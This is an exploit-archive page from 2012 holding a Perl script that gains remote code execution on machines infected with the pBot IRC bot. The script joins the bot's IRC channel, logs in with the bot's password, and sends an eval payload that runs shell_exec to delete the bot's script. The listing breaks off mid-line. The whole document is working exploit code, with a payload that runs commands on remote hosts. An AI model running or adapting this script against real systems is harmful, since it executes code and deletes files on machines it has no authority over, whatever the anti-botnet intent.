Home / exploits pBot Remote Code Execution
Posted on 01 August 2012
#!/usr/bin/perl # Exploit Title: pBot Remote Code Execution ("*" hostauth) # Date: 31.07.2012 # Exploit Author: @bwallHatesTwits # Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack) # Version: Various versions # Tested on: Linux 3.2 use IO::Socket; use IO::Select; use IO::Socket::INET; use Socket; my $nickname = "BotSlayer"; my $ident = "BotSlayer"; my $fullname = "BotSlayer"; $sel_client = IO::Select->new(); #configuration values from the bot source $ircserver = "localhost"; #"server" $ircserverpass = ""; #"pass" my $ircport = "6667"; #"port" #if "key" is set, then add a space and the password to the chan name my @channels = ("#anonbxu"); #"chan" and "chan2" $botPass = "hello"; #"password" $botTrigger = "."; #"trigger" #hostauth must be "*" $loginCMD = "user"; #usually user or login #payload - PHP code to run #This version deletes the bots originating script, and dies $phpEval = "shell_exec("rm -f ".$_SERVER['SCRIPT_NAME']);exit();"; $channelCount = scalar(@channels); sub onJoin { my $channel = shift; $channel = substr($channel, 1); print "Joined $channel "; say($channel, $botTrigger.$loginCMD." $botPass"); sleep(1); say($channel, $botTrigger."eval @BallastSec ".$phpEval); print "Payload delivered "; tryQuit(); } sub tryQuit { $channelCount--; if($channelCount == 0) { quit("whomp wha"); } } sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1] "; } else { print $IRC_cur_socket "$_[0] "; } } sub conn { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; if($ircserverpass != "") { sendraw("PASS ".$ircserverpass); } sendraw("NICK ".$mynick); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; } } sub parse { my $servarg = shift; print $servarg." "; if ($servarg =~ /^PING :(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) JOIN (.+)/) { my $channel = $4; onJoin($channel); } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^